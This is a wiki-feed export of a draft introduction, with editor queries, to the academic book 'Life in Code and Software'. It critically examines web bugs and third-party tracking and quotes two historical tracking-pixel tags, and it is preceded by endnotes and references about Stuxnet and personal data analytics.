Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4706</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4706"/>
		<updated>2012-04-18T14:23:51Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
